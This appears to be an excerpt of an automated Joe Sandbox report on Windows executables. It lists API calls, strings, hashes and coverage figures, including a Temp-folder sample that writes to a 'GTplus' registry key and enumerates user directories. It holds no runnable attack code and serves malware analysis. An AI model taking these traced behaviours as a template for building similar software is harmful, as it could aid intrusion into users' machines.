                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend
                                    • String ID:
                                    • API String ID: 1496643700-0
                                    • Opcode ID: 0d08776e8942e08ca592f45d50dc89b5ebf63781d49a8ec3e0b33e8996ca1901
                                    • Instruction ID: 9756b8d2e24d211fda192ceda1147f0c6b5ff3530c2c49301c62d9b94231b973
                                    • Opcode Fuzzy Hash: 0d08776e8942e08ca592f45d50dc89b5ebf63781d49a8ec3e0b33e8996ca1901
                                    • Instruction Fuzzy Hash: 9301003240111ABBCF125F65EC05DDF3B26AF45354F044426FE0455161D739CA36EBB9
                                    APIs
                                    • RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 004C431F
                                    • RegCloseKey.ADVAPI32(00000000,?,?), ref: 004C4328
                                    • wsprintfA.USER32 ref: 004C4344
                                    • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 004C435D
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClosePrivateProfileStringValueWritewsprintf
                                    • String ID:
                                    • API String ID: 1902064621-0
                                    • Opcode ID: f822efc57f119980b54195db91f83eced589589e2e7fa163ecbbcb2aee5faef4
                                    • Instruction ID: 0e6db0881935dd224baa13d775f8efbdf1714d7deb8968fc9dc763a79b8d7058
                                    • Opcode Fuzzy Hash: f822efc57f119980b54195db91f83eced589589e2e7fa163ecbbcb2aee5faef4
                                    • Instruction Fuzzy Hash: AC01A236900615BBCB515F68DC09FEA7BA8FF84714F05443ABE1196060E774D5219B98
                                    APIs
                                    • GetWindowExtEx.GDI32(?,00441DAA,00000000,?,?,00000000,00441DAA,?,?,00000000,?,000000FF,00443CA9,?,00000000,?), ref: 004C2DBB
                                    • GetViewportExtEx.GDI32(?,?,?,?,00000000,00441DAA,?,?,00000000,?,000000FF,00443CA9,?,00000000,?,?), ref: 004C2DC8
                                    • MulDiv.KERNEL32(00441DAA,00000000,00000000), ref: 004C2DED
                                    • MulDiv.KERNEL32(0C244C8D,00000000,00000000), ref: 004C2E08
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ViewportWindow
                                    • String ID:
                                    • API String ID: 1589084482-0
                                    • Opcode ID: bfc08c58b42ce3829b2610a68ada3a965c6229fd7f4e2c4d9f7f45e375d1f74f
                                    • Instruction ID: b3765eb2fc1337b0d938c253478f28a31907a513c084715245822d1c3ce8e3aa
                                    • Opcode Fuzzy Hash: bfc08c58b42ce3829b2610a68ada3a965c6229fd7f4e2c4d9f7f45e375d1f74f
                                    • Instruction Fuzzy Hash: FEF01972800118FFEB116B66DD0ACBEBBBDEF50714B10443EF85192170EB756E519B54
                                    APIs
                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,00000001,00000000,00000000), ref: 0041DC2A
                                    • RegQueryValueA.ADVAPI32 ref: 0041DC4E
                                    • lstrcpy.KERNEL32(?,00000000), ref: 0041DC61
                                    • RegCloseKey.ADVAPI32(?), ref: 0041DC6C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValuelstrcpy
                                    • String ID:
                                    • API String ID: 534897748-0
                                    • Opcode ID: 387668aa539149f81a58d86519821bf266b3a325d45d207e06df99955fa81219
                                    • Instruction ID: 5a41a924eaafdc77402ae56f8f830a1e4b052feb2dfcee390b7be0bf1a17819d
                                    • Opcode Fuzzy Hash: 387668aa539149f81a58d86519821bf266b3a325d45d207e06df99955fa81219
                                    • Instruction Fuzzy Hash: ECF04FB9504301BFD320DB14DC88EABBBA8FBC4754F00892CF98882250E670E845CBE2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: <
                                    • API String ID: 0-4251816714
                                    • Opcode ID: 7307476828a1f867869add80bc2ced435850eeba50882984640bd88944948299
                                    • Instruction ID: b1e7bab281e4aaf7d00eee967deb939ab4fe19a4158f1f9572939c5571e3108f
                                    • Opcode Fuzzy Hash: 7307476828a1f867869add80bc2ced435850eeba50882984640bd88944948299
                                    • Instruction Fuzzy Hash: 9EB1C6716087518BC324DF28D890A6FB7E1BFC5714F648A2EF896D7340DB34D9098B56
                                    APIs
                                    • __startOneArgErrorHandling.LIBCMT ref: 004AA312
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ErrorHandling__start
                                    • String ID: pow
                                    • API String ID: 3213639722-2276729525
                                    • Opcode ID: 3bb39e229cdeab26f71b3dd31d714e0d7e0e203ef363955f9717881901447778
                                    • Instruction ID: 9ca4fced2e17d248d7986c3c317e1751ba1f9630cd047b99a970948bc96e28db
                                    • Opcode Fuzzy Hash: 3bb39e229cdeab26f71b3dd31d714e0d7e0e203ef363955f9717881901447778
                                    • Instruction Fuzzy Hash: 76513B2190820186CF197718C9093FF37949B66751F20899FE89681399EB2DCCEDDB6F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: e5c89328fac4d1e9998f4b486f9f3f39ba505947fd3d4c9c936d5a8761bff58f
                                    • Instruction ID: 113d23fbe258d7a352a55eea137ca4b9a81f9009bc6843a7b686b1001ec636d0
                                    • Opcode Fuzzy Hash: e5c89328fac4d1e9998f4b486f9f3f39ba505947fd3d4c9c936d5a8761bff58f
                                    • Instruction Fuzzy Hash: 47517F712053419BD314DF16C891AAFB7A4FB89318F00162EF942833D1D739E946CB9A
                                    APIs
                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0041C78A
                                    • SendMessageA.USER32(?,00000402,?,00000000), ref: 0041C7B7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: msctls_progress32
                                    • API String ID: 3850602802-3107856198
                                    • Opcode ID: a8586357c7d218e16205129112c8e4767d93b408b925cbbb6e874a0220b3c6c8
                                    • Instruction ID: 7c4fe347a6cc56f6d0789f07f74cf866e0ee86d6730dd7a1926425c036ff034b
                                    • Opcode Fuzzy Hash: a8586357c7d218e16205129112c8e4767d93b408b925cbbb6e874a0220b3c6c8
                                    • Instruction Fuzzy Hash: 4C418E72354B119BE328CA19CC81F6BB3E6EBC8B14F14892EF646C7780D679EC418B55
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID: 0-3916222277
                                    • Opcode ID: 4efa564978a40623f040414e2ad8eb5c97866d94ef5968e1f122cc4228ab0771
                                    • Instruction ID: 3abac848f70641818e9afec5e7a128d8e54431c441953fbb78636d00104a06d7
                                    • Opcode Fuzzy Hash: 4efa564978a40623f040414e2ad8eb5c97866d94ef5968e1f122cc4228ab0771
                                    • Instruction Fuzzy Hash: 563178B12083419FC754DF25C954BABB7F4FF88724F004A2EF89683290D778A945CB5A
                                    APIs
                                    • GetStockObject.GDI32(00000005), ref: 00417EA1
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 00417EAF
                                      • Part of subcall function 004343B0: GetClassInfoA.USER32(?,?,?), ref: 004343C8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ClassCursorInfoLoadObjectStock
                                    • String ID: _EL_Label
                                    • API String ID: 1762135420-1571322718
                                    • Opcode ID: fe832d07d867716caea26dd5c9d7337806877a0442c4243bad03f432bc539ba1
                                    • Instruction ID: 96b03d267a2899fdce80f712d500971b411e6a873caa640200395a490e6f6712
                                    • Opcode Fuzzy Hash: fe832d07d867716caea26dd5c9d7337806877a0442c4243bad03f432bc539ba1
                                    • Instruction Fuzzy Hash: 10317EB1608700AFD214DB59CD42F6BB7F5EB88B00F004A1EF55A97390D775AC01CBAA
                                    APIs
                                      • Part of subcall function 0043A960: DeleteObject.GDI32(?), ref: 0043A974
                                    • DestroyCursor.USER32(?), ref: 0041F054
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDeleteDestroyObject
                                    • String ID: ,WL$pTL
                                    • API String ID: 1476932828-3286615107
                                    • Opcode ID: 601ebee34ae3936179f86c7e25e8d453a702ae3f0b58bb3b5bce9165ecf9c162
                                    • Instruction ID: abcd142ad71d57c67957d5775debc069e4b66dc8a50ae2204fa151b66210daaf
                                    • Opcode Fuzzy Hash: 601ebee34ae3936179f86c7e25e8d453a702ae3f0b58bb3b5bce9165ecf9c162
                                    • Instruction Fuzzy Hash: 5C317C74504B42CFD314DF66C490B9AFBE0BF55318F44892EE4AA83741C778A609CFAA
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 00425DFA
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 00425E27
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologRect$BeginBrushClipCreateEmptyFillPaintSolid
                                    • String ID: pTL
                                    • API String ID: 3827101677-168633513
                                    • Opcode ID: 849d6c0ec3e37bd620472d06f30bd6771b329386ef28d82e360d7396f153af31
                                    • Instruction ID: 24259b843354b992461d49e6a8d7c46249c3ecd264c40818019f0c1e8d2d94c7
                                    • Opcode Fuzzy Hash: 849d6c0ec3e37bd620472d06f30bd6771b329386ef28d82e360d7396f153af31
                                    • Instruction Fuzzy Hash: B431AF752087509FD314EF20C991FABB7E4BF88708F50891EF5A643291DBB8DA04CB66
                                    APIs
                                      • Part of subcall function 0043A960: DeleteObject.GDI32(?), ref: 0043A974
                                    • DestroyCursor.USER32(?), ref: 0041BF7E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorDeleteDestroyObject
                                    • String ID: ,WL$pTL
                                    • API String ID: 1476932828-3286615107
                                    • Opcode ID: 5f3fead24833251ed92028c9d1dd53232e6704ad58255eddf26a865bf0b99541
                                    • Instruction ID: 8575c1aaab52896b8854b459f33dc7ac8b5529b305081f5d80f41c7b9476b028
                                    • Opcode Fuzzy Hash: 5f3fead24833251ed92028c9d1dd53232e6704ad58255eddf26a865bf0b99541
                                    • Instruction Fuzzy Hash: CC214AB5904742DFC314DF66C880A96FBE4FF54314F448A2EE4AA83741C778A509CFA6
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 00417564
                                      • Part of subcall function 00413AA0: GetSysColor.USER32(0000000F), ref: 00413AAD
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 00417596
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologRect$BeginBrushClipColorCreateEmptyFillPaintSolid
                                    • String ID: pTL
                                    • API String ID: 534515830-168633513
                                    • Opcode ID: 3d43f345c0ee6032f59d478415723119a875c9d9930fdc7b76ff7428b883b08a
                                    • Instruction ID: 5faaa814b520aa5db3e848f2d67c6ae38c6f9d45018c8237acc9e5bed10623ee
                                    • Opcode Fuzzy Hash: 3d43f345c0ee6032f59d478415723119a875c9d9930fdc7b76ff7428b883b08a
                                    • Instruction Fuzzy Hash: BC219D75608B40AFD320EF24C840FABB7E8BB48714F04891EF4A683790DB78DA04CB56
                                    APIs
                                    • SendMessageA.USER32(00415E35,000000B1,00000000,000000FF), ref: 00415F1D
                                    • SendMessageA.USER32(00415E35,000000B7,00000000,00000000), ref: 00415F2C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: MessageSend
                                    • String ID: 5^A
                                    • API String ID: 3850602802-4160946101
                                    • Opcode ID: d247cf3e3a44aea95b455a19998177c14d2596c31b37c7479a27b1962a8ca024
                                    • Instruction ID: ae996621357e419a2b1836c855971881300344079edc5849084fd7216a5cf831
                                    • Opcode Fuzzy Hash: d247cf3e3a44aea95b455a19998177c14d2596c31b37c7479a27b1962a8ca024
                                    • Instruction Fuzzy Hash: 3411B675604B01EBD328DB29CC41FABB7E5ABC4720F104B0EF469973D0CB78A8058B65
                                    APIs
                                      • Part of subcall function 004C2FE4: __EH_prolog.LIBCMT ref: 004C2FE9
                                      • Part of subcall function 004C2FE4: BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                      • Part of subcall function 004C2B95: GetClipBox.GDI32(?,?), ref: 004C2B9C
                                    • IsRectEmpty.USER32(?), ref: 0042591D
                                      • Part of subcall function 00413AA0: GetSysColor.USER32(0000000F), ref: 00413AAD
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 00425950
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologRect$BeginBrushClipColorCreateEmptyFillPaintSolid
                                    • String ID: pTL
                                    • API String ID: 534515830-168633513
                                    • Opcode ID: 5f6e00adf3f7ab20d58d2dbbd54e088dd88927efcce405a77d8fc206a5f3b728
                                    • Instruction ID: 552e561fdbf0166cd28adb9a79dbbaed0f2a92054f4daae748d5b24d6d2a34ac
                                    • Opcode Fuzzy Hash: 5f6e00adf3f7ab20d58d2dbbd54e088dd88927efcce405a77d8fc206a5f3b728
                                    • Instruction Fuzzy Hash: 9011C2B9508741EFC340EF60C945F5BB7E4BB84718F408A1DF0AA82291DB38D608CB56
                                    APIs
                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000800,?,004B657E,?,00000000,00000000,?,00000800,00000000,004B628F,?,00000000), ref: 004B65D0
                                    • GetLastError.KERNEL32(?,004B49DB,?,00000000,?,004B440B,00000000,00000000,00000000), ref: 004B65DD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ErrorFileLastPointer
                                    • String ID: Vv
                                    • API String ID: 2976181284-3647087049
                                    • Opcode ID: 9dca706799b8bd5e741fd39d64bcc904f3b0abb6ed8f2a996d6f725ca07f0531
                                    • Instruction ID: b129794a52d0e3bc3e160ab28d139e9a8e4c8d756075aadc5976d19f53a86bf1
                                    • Opcode Fuzzy Hash: 9dca706799b8bd5e741fd39d64bcc904f3b0abb6ed8f2a996d6f725ca07f0531
                                    • Instruction Fuzzy Hash: F2F0A93121451197CA605B78BD489AA3759AB86334F220B6FF521C71E1DF2CD8258676
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C38FE
                                    • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 004C396A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prologMessageSend
                                    • String ID: JeL
                                    • API String ID: 2337391251-3853271901
                                    APIs
                                    • SetWindowOrgEx.GDI32(?,5JC,?,?), ref: 004C2AC7
                                    • SetWindowOrgEx.GDI32(?,5JC,?,?), ref: 004C2ADB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Window
                                    • String ID: 5JC
                                    • API String ID: 2353593579-950159820
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C2E81
                                    • 7405A570.USER32(?,?,?,004113C0,00000000), ref: 004C2EAA
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: 7405A570H_prolog
                                    • String ID: DTL
                                    • API String ID: 4111123777-695167461
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C2FE9
                                    • BeginPaint.USER32(?,?,?,?,00417549), ref: 004C3012
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BeginH_prologPaint
                                    • String ID: PTL
                                    • API String ID: 1900852855-843080265
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CreateH_prolog
                                    • String ID: vTL
                                    • API String ID: 1255700769-243292187
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: BrushCreateH_prologSolid
                                    • String ID: |TL
                                    • API String ID: 707096553-51895757
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004C305B
                                    • EndPaint.USER32(?,?,?,?,004175C3), ref: 004C3078
                                      • Part of subcall function 004C2662: __EH_prolog.LIBCMT ref: 004C2667
                                      • Part of subcall function 004C2662: DeleteDC.GDI32(00000000), ref: 004C2686
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog$DeletePaint
                                    • String ID: PTL
                                    • API String ID: 2732140596-843080265
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 004BADB1
                                      • Part of subcall function 004BE544: __EH_prolog.LIBCMT ref: 004BE549
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID: ~dL$~dL
                                    • API String ID: 3519838083-546918951
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: DeleteH_prolog
                                    • String ID: >TL
                                    • API String ID: 3406903920-1879671907
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: wsprintf
                                    • String ID:
                                    • API String ID: 2111968516-0
                                    • Opcode ID: 5433175e1be277195485b1c9d971552ce9ba47b55ba87389da034c8af8698540
                                    • Instruction ID: a6b1acd503c6c62abdab22268181d54ddd1336cfdc505f0f35d34971045040a2
                                    • Opcode Fuzzy Hash: 5433175e1be277195485b1c9d971552ce9ba47b55ba87389da034c8af8698540
                                    • Instruction Fuzzy Hash: 5831B7B55043005BC304DF64DC45DABBBD8EFC9758F040A2DF94693281EB79EE08C6A6
                                    APIs
                                    • lstrlen.KERNEL32(?,?,?,?,00411B4C,?,?), ref: 004C6E73
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?,00411B4C,?,?), ref: 004C6E9A
                                    • lstrlen.KERNEL32(?,?,?,?,00411B4C,?,?), ref: 004C6EB5
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001,?,?,00411B4C,?,?), ref: 004C6EDC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ByteCharMultiWidelstrlen
                                    • String ID:
                                    • API String ID: 3109718747-0
                                    • Opcode ID: 4c7af76a83e66cde83a76876f5b713da53b32172024a0345ce9e4012b0d200d5
                                    • Instruction ID: be29f5c996b7b21d4b04c35b2a29eb188c2bf6bd21b6f635e7a8ec6e970845c6
                                    • Opcode Fuzzy Hash: 4c7af76a83e66cde83a76876f5b713da53b32172024a0345ce9e4012b0d200d5
                                    • Instruction Fuzzy Hash: F011213B804205BBCB911BA1DC09F9BBF68EF82760F218136F819861A0E734D51187A9

                                    Execution Graph

                                    Execution Coverage:28.7%
                                    Dynamic/Decrypted Code Coverage:10.4%
                                    Signature Coverage:4.4%
                                    Total number of Nodes:297
                                    Total number of Limit Nodes:11


                                    Control-flow Graph

                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1355431846.0000000000B31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00B30000, based on PE: true
                                    • Associated: 00000009.00000002.1354831772.0000000000B30000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1355833227.0000000000B33000.00000002.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356241660.0000000000B34000.00000004.00000001.01000000.00000005.sdmp
                                    • Associated: 00000009.00000002.1356631152.0000000000B36000.00000040.00000001.01000000.00000005.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_b30000_YMZwp.jbxd
                                    Similarity
                                    • API ID: memset$Find$Filelstrcmpilstrlen$CloseFirstNextlstrcpynstrrchrwsprintf
                                    • String ID: %s*$C:\$Documents and Settings
                                    • API String ID: 2826467728-110786608
                                    • Opcode ID: 65d3a9104539c0bbc245072a81cb2527e81ac839ee30a5bc635fe435958fcc91
                                    • Instruction ID: 7f8e9c347e89d2dd6d4127f31c1f36d073d839122573dc876db62a07d7b40b15
                                    • Opcode Fuzzy Hash: 65d3a9104539c0bbc245072a81cb2527e81ac839ee30a5bc635fe435958fcc91
                                    • Instruction Fuzzy Hash: 6C4165B2804349AFD721DBA0DC89EDFB7ECEB84715F240869F944D3111FA34D6488BA2

                                    Control-flow Graph

                                    APIs
                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\YMZwp.exe), ref: 00B31729
                                    • SHSetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,00000003,?,00000008), ref: 00B3174C
                                    • SHGetValueA.SHLWAPI(80000002,SOFTWARE\GTplus,Time,?,?,00000001), ref: 00B3177C
                                    • __aulldiv.LIBCMT ref: 00B31796
                                    • __aulldiv.LIBCMT ref: 00B317A8
                                    Strings
                                    Memory Dump Source
